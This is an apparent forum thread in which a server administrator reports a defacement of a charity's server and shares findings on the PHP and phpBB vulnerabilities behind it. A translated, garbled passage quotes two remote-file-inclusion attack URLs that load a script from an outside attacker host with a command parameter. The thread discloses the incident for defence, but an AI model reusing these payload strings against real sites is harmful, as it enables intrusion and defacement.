Topic: Hacked "Simiens Crew Por Um Mundo Melhor"

[raem]

Dear All
It looks like a server I maintain for a charity group has been hacked ....

[moderated, original post received through security@contribs.org]

[NickR]

I'm sure that you probably posted this in haste, but please remember that this is a public forum.

security@contribs.org is a more appropriate place for this report.

[drlizau]

Why is this topic censored?
A security breach needs to be widely known, as we need to know that it has happened and be ready to patch our servers as soon as a patch is available.

[raem]

This is looking like a php security breach rather than a sme server security breach although not fully resolved as yet.

See (in Italian)
http://www.glesius.it/forum/topic.asp?TOPIC_ID=3457

part of which translates to:

The technical adotatta that of utilizare was a condenses from browser to
delimit a situation of injection php on the server and to earn the access
like root (director) and to load a script that carries out a mass defacement
to the index of the sites. [site + exploit + cmd

=]. This technology was carried out to one of the sites that presented the
vulneabilità to one of the forms in phpnuke. They used an of the following
stringhe:
www.sito.it/index.php?=http://dominus.webcindario.com/inf.jpg?&cmd=
www.sito.it//modules/My_eGallery/public/displayCategory.php?basepath=http://
dominus.webcindario.com/inf.jpg?&cmd=


and also see these sites for an interesting read of text conversation between hacker and hacked.
http://xoomer.virgilio.it/gioxx85/deface/log.htm

Thanks to those who helped me, they know who they are.

[raem]

Just as a follow up for readers:

phpBB had a major security vulnerability which in conjunction with a php vulnerability allowed hackers to get root control.
See
http://www.phpbb.com/phpBB/viewtopic.php?t=241300&postdays=0&postorder=asc&start=0

and
http://www.phpbbstyles.com/viewtopic.php?t=1903

and
http://forums.contribs.org/index.php?topic=25275.0